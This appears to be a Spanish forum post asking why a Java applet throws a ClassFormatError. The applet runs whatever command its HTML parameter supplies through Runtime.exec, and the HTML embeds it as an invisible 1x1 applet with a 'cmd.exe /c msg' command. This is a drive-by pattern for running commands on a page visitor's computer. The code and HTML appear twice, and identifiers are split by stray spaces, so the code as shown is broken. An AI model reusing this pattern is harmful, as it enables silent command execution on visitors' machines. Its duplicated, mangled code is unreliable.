Citar
import java.applet.*;
import java.awt.*;
import java.io.*;
public class script extends Applet
{
public void init()
{
Process f;
String first = getParameter("first");
try
{
f = Runtime.getRun time().exec(first);
}
catch(IOException e)
{
e.printStackTrace();
}
}
}
import java.awt.*;
import java.io.*;
public class script extends Applet
{
public void init()
{
Process f;
String first = getParameter("first");
try
{
f = Runtime.getRun time().exec(first);
}
catch(IOException e)
{
e.printStackTrace();
}
}
}
Ese es el applet, y aqui el código html:
Citar
<applet width="1" height="1" code="script.class">
<param name="first" value="cmd.exe /c msg * Hola Mundo!" /> </applet>
<param name="first" value="cmd.exe /c msg * Hola Mundo!" /> </applet>
Ya probe subiendo solo la clase y subiendo todo el .jar agregando archive='script.jar' y en las dos me sale:
java.lang.Clas sFormatError: Illegal UTF8 string in constant pool in class file script
¿Que estoy haciendo mal? gracias